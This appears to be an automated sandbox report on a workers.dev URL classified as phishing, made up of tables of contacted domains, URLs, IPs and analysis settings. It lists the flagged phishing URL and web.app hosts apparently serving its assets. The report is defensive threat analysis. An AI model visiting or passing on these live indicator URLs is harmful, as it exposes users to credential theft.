                                                                      unknownfalse
                                                                        unknown
                                                                        static1.squarespace.com
                                                                        unknown
                                                                        unknownfalse
                                                                          unknown
                                                                          ct.pinterest.com
                                                                          unknown
                                                                          unknownfalse
                                                                            unknown
                                                                            pixel-config.reddit.com
                                                                            unknown
                                                                            unknownfalse
                                                                              unknown
                                                                              trc-events.taboola.com
                                                                              unknown
                                                                              unknownfalse
                                                                                unknown
                                                                                use.typekit.net
                                                                                unknown
                                                                                unknownfalse
                                                                                  unknown
                                                                                  www.redditstatic.com
                                                                                  unknown
                                                                                  unknownfalse
                                                                                    unknown
                                                                                    images.squarespace-cdn.com
                                                                                    unknown
                                                                                    unknownfalse
                                                                                      unknown
                                                                                      trc.taboola.com
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        unknown
                                                                                        p.typekit.net
                                                                                        unknown
                                                                                        unknownfalse
                                                                                          unknown
                                                                                          s.pinimg.com
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            unknown
                                                                                            cdn.taboola.com
                                                                                            unknown
                                                                                            unknownfalse
                                                                                              unknown
                                                                                              maps-api-ssl.google.com
                                                                                              unknown
                                                                                              unknownfalse
                                                                                                unknown
                                                                                                analytics.tiktok.com
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  unknown
                                                                                                  NameMaliciousAntivirus DetectionReputation
                                                                                                  https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/css/style.css?ver=1.3.1false
                                                                                                    unknown
                                                                                                    https://about.christianmingle.com/wp-includes/css/dist/block-library/style.min.css?ver=6.5.3false
                                                                                                      unknown
                                                                                                      https://about.christianmingle.com/wp-content/themes/monstroid2/skins/default/style-default.css?ver=1.2.0false
                                                                                                        unknown
                                                                                                        https://ruletridominium.web.app/tp.pngfalse
                                                                                                          unknown
                                                                                                          https://w3-reporting-nel.reddit.com/reportsfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://ct.pinterest.com/user/?event=pagevisit&ed=%7B%22np%22%3A%22gtm%22%2C%22event_id%22%3A%22e75628eb-50f0-4a64-a25f-6d81889a2f47%22%7D&tid=2612341756004&cb=1728225783003&dep=5%2CEVENT_TAGS_ABSENTfalse
                                                                                                            unknown
                                                                                                            https://chattts-49f1.beszyrecala.workers.dev/16059c05-eb99-4880-8bcd-d4=true
                                                                                                              unknown
                                                                                                              https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/false
                                                                                                                unknown
                                                                                                                https://about.christianmingle.com/wp-content/themes/monstroid2/assets/css/swiper.min.css?ver=3.3.0false
                                                                                                                  unknown
                                                                                                                  https://ruletridominium.web.app/0660c9ab1b018a073e06d7a13b0b3959940effba.ttffalse
                                                                                                                    unknown
                                                                                                                    https://www.spark.net/our-story/false
                                                                                                                      unknown
                                                                                                                      https://static1.squarespace.com/static/versioned-site-css/65ddde819292aa47ed2c6d1d/8/5c5a519771c10ba3470d8101/65ddde819292aa47ed2c6d25/1567/site.cssfalse
                                                                                                                        unknown
                                                                                                                        https://images.squarespace-cdn.com/content/v1/65ddde819292aa47ed2c6d1d/56d929e6-8419-4133-89bf-d861886af153/SilverSingles_1.png?format=750wfalse
                                                                                                                          unknown
                                                                                                                          https://trc-events.taboola.com/1121901/log/3/unip?en=pre_d_eng_tb&tos=10607&scd=0&ssd=1&est=1728225782012&ver=36&isls=true&src=i&invt=6000&msa=209&rv=1&tim=1728225792623&mrir=tto&vi=1728225782001&ref=null&cv=20241006-3-RELEASE&item-url=https%3A%2F%2Fabout.christianmingle.com%2Fen%2Flegal-en%2Four-commitment-to-accessibility%2F&cbp=OneTrust&cbpv=1&cbcd=%2CC0001%2C&it=JS_PIXELfalse
                                                                                                                            unknown
                                                                                                                            https://cdn.cookielaw.org/scripttemplates/otSDKStub.jsfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/js/libs/jquery.reverse.js?ver=1.3.1false
                                                                                                                              unknown
                                                                                                                              https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/js/jquery.tm-pb-simple-slider.js?ver=1.3.1false
                                                                                                                                unknown
                                                                                                                                https://images.squarespace-cdn.com/content/v1/624b503b5d73881124e70a24/1649102938116-IM1UQW3EJ4W5NZFG3WTM/Stocksy_comp_1338592.jpg?format=1500wfalse
                                                                                                                                  unknown
                                                                                                                                  https://ct.pinterest.com/v3/?tid=2612341756004&pd=%7B%22np%22%3A%22gtm%22%7D&event=init&ad=%7B%22loc%22%3A%22https%3A%2F%2Fabout.christianmingle.com%2Fen%2Flegal-en%2Four-commitment-to-accessibility%2F%22%2C%22ref%22%3A%22%22%2C%22if%22%3Afalse%2C%22sh%22%3A1024%2C%22sw%22%3A1280%2C%22mh%22%3A%2297c41ef3%22%2C%22is_eu%22%3Atrue%2C%22architecture%22%3A%22x86%22%2C%22bitness%22%3A%2264%22%2C%22brands%22%3A%5B%7B%22brand%22%3A%22Google%20Chrome%22%2C%22version%22%3A%22117%22%7D%2C%7B%22brand%22%3A%22Not%3BA%3DBrand%22%2C%22version%22%3A%228%22%7D%2C%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%22117%22%7D%5D%2C%22mobile%22%3Afalse%2C%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0.0%22%2C%22uaFullVersion%22%3A%22117.0.5938.134%22%2C%22ecm_enabled%22%3Atrue%7D&cb=1728225783006false
                                                                                                                                    unknown
                                                                                                                                    https://www.spark.net/our-portfolio/false
                                                                                                                                      unknown
                                                                                                                                      https://ruletridominium.web.app/appboy.min.cssfalse
                                                                                                                                        unknown
                                                                                                                                        https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/js/libs/waypoints.min.js?ver=1.3.1false
                                                                                                                                          unknown
                                                                                                                                          https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/css/swiper.min.css?ver=1.3.1false
                                                                                                                                            unknown
                                                                                                                                            https://ruletridominium.web.app/9d77aa1062194b9635ee9a90c75217c2.svgfalse
                                                                                                                                              unknown
                                                                                                                                              https://about.christianmingle.com/wp-includes/js/wp-emoji-release.min.js?ver=6.5.3false
                                                                                                                                                unknown
                                                                                                                                                https://about.christianmingle.com/wp-content/themes/monstroid2-child/style.css?ver=1.0.0false
                                                                                                                                                  unknown
                                                                                                                                                  https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/js/tm-hash.js?ver=1.3.1false
                                                                                                                                                    unknown
                                                                                                                                                    blob:https://chattts-49f1.beszyrecala.workers.dev/72b8d5d8-909a-42bb-a197-ad8f18b1e6d0true
                                                                                                                                                      unknown
                                                                                                                                                      https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/js/libs/jquery.mobile.custom.min.js?ver=1.3.1false
                                                                                                                                                        unknown
                                                                                                                                                        https://ct.pinterest.com/user/?tid=2612341756004&pd=%7B%22np%22%3A%22gtm%22%7D&cb=1728225782998&dep=2%2CPAGE_LOADfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://www.spark.net/api/census/RecordHitfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://code.jquery.com/jquery-3.4.1.min.jsfalse
                                                                                                                                                              unknown
                                                                                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                              https://github.com/noureddinemchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://g.co/dev/maps-no-accountchromecache_372.2.dr, chromecache_349.2.drfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://github.com/ebraminiochromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://github.com/jonashdownchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://ampcid.google.com/v1/publisher:getClientIdchromecache_269.2.dr, chromecache_182.2.drfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://github.com/ryanhart2chromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://daquinoliquor.com.au/wp-content/plugins/under-construction-page/themes/mad_designer/mad-desigchromecache_199.2.drfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://yuilibrary.com/license/chromecache_297.2.dr, chromecache_245.2.drfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://github.com/Manfre98chromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://github.com/vnathalyechromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://github.com/le0tanchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://github.com/narainsagarchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://github.com/ElFadiliYchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://github.com/ashwoolfordchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://github.com/jbleduigouchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://github.com/muminoffchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://openjsf.org/chromecache_354.2.dr, chromecache_339.2.drfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://developers.google.com/maps/documentation/javascript/styling#cloud_toolingchromecache_349.2.drfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://github.com/jatinag22chromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://support.google.com/fusiontables/answer/9185417).chromecache_372.2.dr, chromecache_349.2.drfalse
                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://developers.google.com/maps/deprecationschromecache_372.2.dr, chromecache_349.2.drfalse
                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://github.com/hehachrischromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://github.com/jarcoalchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://github.com/jcfrancochromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://creativecommons.org/licenses/by/3.0/)chromecache_379.2.drfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://github.com/andela-batolagbechromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://github.com/bleadofchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://images.squarespace-cdn.com/content/v1/65ddde819292aa47ed2c6d1d/5861c518-d165-4c71-9072-2fa34chromecache_355.2.drfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://www.collegehumor.comchromecache_222.2.dr, chromecache_237.2.drfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://github.com/imakewebthings/waypoints/blog/master/licenses.txtchromecache_364.2.dr, chromecache_307.2.drfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://ruletridominium.web.app/0f339c2e26ad0c91253064ed7796c40d9801e40e.ttfchromecache_256.2.drfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://www.jdate.comchromecache_277.2.drfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  http://underscorejs.org/LICENSEchromecache_354.2.dr, chromecache_339.2.drfalse
                                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://github.com/suvashchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://github.com/andrewhood125chromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://github.com/ShahramMebasharchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        http://www.funnyordie.comchromecache_222.2.dr, chromecache_237.2.drfalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://github.com/skakrichromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://use.typekit.net/af/8ac9a7/00000000000000007735adcc/30/chromecache_362.2.dr, chromecache_254.2.drfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://github.com/jalex79chromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://github.com/krazchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://github.com/sampathsrischromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://github.com/ulmuschromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      https://github.com/orif-jrchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://developers.google.com/maps/documentation/javascript/error-messages#unsupported-browserschromecache_349.2.drfalse
                                                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://github.com/toddmotto/fluidvids/blob/master/dist/fluidvids.jschromecache_228.2.dr, chromecache_225.2.drfalse
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          https://i.liadm.com/s/66627?bidder_id=88068&bidder_uuid=b94bfb63-f96a-4438-a07a-81f9d8e258f1-tuctdfcchromecache_308.2.drfalse
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            https://github.com/sedovsekchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              https://github.com/k2schromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                https://developers.google.com/maps/documentation/javascript/librarieschromecache_372.2.dr, chromecache_349.2.drfalse
                                                                                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                https://cdn.cookielaw.org/vendorlist/googleData.jsonchromecache_205.2.dr, chromecache_373.2.drfalse
                                                                                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                https://github.com/chrisgedrimchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  https://github.com/colindeanchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                    https://cdn.cookielaw.org/vendorlist/iab2Data.jsonchromecache_205.2.dr, chromecache_373.2.drfalse
                                                                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                    https://github.com/chriscartlidgechromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      https://github.com/mechuwindchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        https://sourcemaps.squarespace.net/universal/scripts-compressed/sourcemaps/34b27b07f88d77b43ccdab3e6chromecache_375.2.dr, chromecache_365.2.drfalse
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          https://github.com/MadMGchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                            https://github.com/bkycehchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              https://sourcemaps.squarespace.net/universal/scripts-compressed/sourcemaps/3978c0c2aa2735b7412720c37chromecache_352.2.dr, chromecache_283.2.drfalse
                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                https://github.com/fadselchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                  https://cookiepedia.co.uk/giving-consent-to-cookieschromecache_350.2.dr, chromecache_324.2.drfalse
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    https://github.com/Amine27chromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                      https://github.com/liabru/matter-wrapchromecache_354.2.dr, chromecache_339.2.drfalse
                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                        https://github.com/avalychromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                          https://github.com/mergehezchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                            https://github.com/cepemchromecache_311.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                              https://ruletridominium.web.app/5ad55f8d768f0d8bd5328d88a9415790046714fcchromecache_256.2.drfalse
                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                173.208.137.67
                                                                                                                                                                                                                                                                                www.pinclipart.comUnited States
                                                                                                                                                                                                                                                                                32097WIIUSfalse
                                                                                                                                                                                                                                                                                172.67.128.159
                                                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                104.16.80.73
                                                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                151.101.128.238
                                                                                                                                                                                                                                                                                prod.squarespace.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                151.101.128.84
                                                                                                                                                                                                                                                                                dualstack.pinterest.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                151.101.128.237
                                                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                172.64.152.123
                                                                                                                                                                                                                                                                                about.christianmingle.comUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                151.101.193.140
                                                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                104.18.32.137
                                                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                35.190.80.1
                                                                                                                                                                                                                                                                                a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                151.101.193.44
                                                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                104.18.87.42
                                                                                                                                                                                                                                                                                cdn.cookielaw.orgUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                172.64.155.119
                                                                                                                                                                                                                                                                                geolocation.onetrust.comUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                104.18.41.106
                                                                                                                                                                                                                                                                                www.spark.netUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                54.165.51.215
                                                                                                                                                                                                                                                                                px.adentifi.comUnited States
                                                                                                                                                                                                                                                                                14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                                                                                                unknownReserved
                                                                                                                                                                                                                                                                                unknownunknownfalse
                                                                                                                                                                                                                                                                                151.101.65.44
                                                                                                                                                                                                                                                                                tls13.taboola.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                151.101.192.84
                                                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                172.217.18.100
                                                                                                                                                                                                                                                                                www.google.comUnited States
                                                                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                151.101.64.238
                                                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                151.101.0.237
                                                                                                                                                                                                                                                                                static.squarespace.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                151.101.0.238
                                                                                                                                                                                                                                                                                squarespace.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                104.21.1.55
                                                                                                                                                                                                                                                                                starpng.comUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                104.18.43.9
                                                                                                                                                                                                                                                                                uploads.codesandbox.ioUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                3.220.154.123
                                                                                                                                                                                                                                                                                rtb.adentifi.comUnited States
                                                                                                                                                                                                                                                                                14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                2.18.48.37
                                                                                                                                                                                                                                                                                eip-ntt.api.pinterest.com.akahost.netEuropean Union
                                                                                                                                                                                                                                                                                33905AKAMAI-AMSEUfalse
                                                                                                                                                                                                                                                                                142.250.185.162
                                                                                                                                                                                                                                                                                cm.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                141.226.228.48
                                                                                                                                                                                                                                                                                am-vip001.taboola.comIsrael
                                                                                                                                                                                                                                                                                200478TABOOLA-ASILfalse
                                                                                                                                                                                                                                                                                151.101.194.137
                                                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                104.16.79.73
                                                                                                                                                                                                                                                                                static.cloudflareinsights.comUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                172.67.196.219
                                                                                                                                                                                                                                                                                chattts-49f1.beszyrecala.workers.devUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                151.101.1.140
                                                                                                                                                                                                                                                                                reddit.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                151.101.2.137
                                                                                                                                                                                                                                                                                code.jquery.comUnited States
                                                                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                199.36.158.100
                                                                                                                                                                                                                                                                                kengegame.web.appUnited States
                                                                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                150.171.27.10
                                                                                                                                                                                                                                                                                ax-0001.ax-msedge.netUnited States
                                                                                                                                                                                                                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                151.101.129.44
                                                                                                                                                                                                                                                                                dualstack.tls13.taboola.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                151.101.129.140
                                                                                                                                                                                                                                                                                dualstack.reddit.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                104.18.86.42
                                                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                35.186.236.0
                                                                                                                                                                                                                                                                                performance.squarespace.comUnited States
                                                                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                                                                192.168.2.6
                                                                                                                                                                                                                                                                                192.168.2.5
                                                                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                Analysis ID:1526832
                                                                                                                                                                                                                                                                                Start date and time:2024-10-06 16:40:51 +02:00
                                                                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                Overall analysis duration:0h 4m 17s
                                                                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                                                                Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                                                                                Sample URL:https://chattts-49f1.beszyrecala.workers.dev/16059c05-eb99-4880-8bcd-d4=
                                                                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                Number of analysed new started processes analysed:9
                                                                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                                                                Classification:mal60.phis.win@22/342@124/41
                                                                                                                                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                                                                • Browse: http://www.spark.net/our-story/
                                                                                                                                                                                                                                                                                • Browse: http://www.spark.net/our-portfolio/
                                                                                                                                                                                                                                                                                • Browse: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/
                                                                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 142.250.186.163, 216.58.206.46, 74.125.71.84, 34.104.35.123, 142.250.186.174, 142.250.186.142, 4.245.163.56, 192.229.221.95, 199.232.210.172, 13.95.31.18, 40.69.42.241, 131.107.255.255, 2.19.126.198, 2.19.126.206, 2.19.126.211, 2.19.126.219, 142.250.181.238, 172.217.16.202, 142.250.186.131, 142.250.185.72, 142.250.181.232, 142.250.185.206, 142.250.185.106, 142.250.185.170, 142.250.186.74, 142.250.185.234, 142.250.185.74, 142.250.181.234, 172.217.18.10, 142.250.185.138, 142.250.185.202, 216.58.206.42, 142.250.184.202, 142.250.184.234, 142.250.186.170, 142.250.186.106, 142.250.186.42, 2.18.64.15, 2.18.64.11, 2.18.64.26, 2.18.64.21, 2.18.64.6, 142.250.186.110, 216.58.212.138, 172.217.16.138, 142.250.74.202, 172.217.23.106, 2.19.224.184, 216.58.206.74, 172.217.18.106, 142.250.186.138, 142.250.185.110
                                                                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): api.pinterest.com.eip.akadns.net, slscr.update.microsoft.com, clientservices.googleapis.com, dns.msftncsi.com, a1874.dscg1.akamai.net, maps.googleapis.com, clients2.google.com, ocsp.digicert.com, use-stls.adobe.com.edgesuite.net, www.googletagmanager.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, 2-01-37d2-0018.cdx.cedexis.net, sls.update.microsoft.com, update.googleapis.com, bat.bing.com, analytics.tiktok.com.edgekey.net, e6449.a.akamaiedge.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.google-analytics.com, clients1.google.com, 2-01-37d2-0020.cdx.cedexis.net, client.wns.windows.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, encrypted-tbn0.gstatic.com, ctldl.windowsupdate.com.delivery.microsoft.com, fonts.gstatic.com, e35058.a.akamaiedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, p.typekit.net-stls-v3.edgesuite.
                                                                                                                                                                                                                                                                                • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
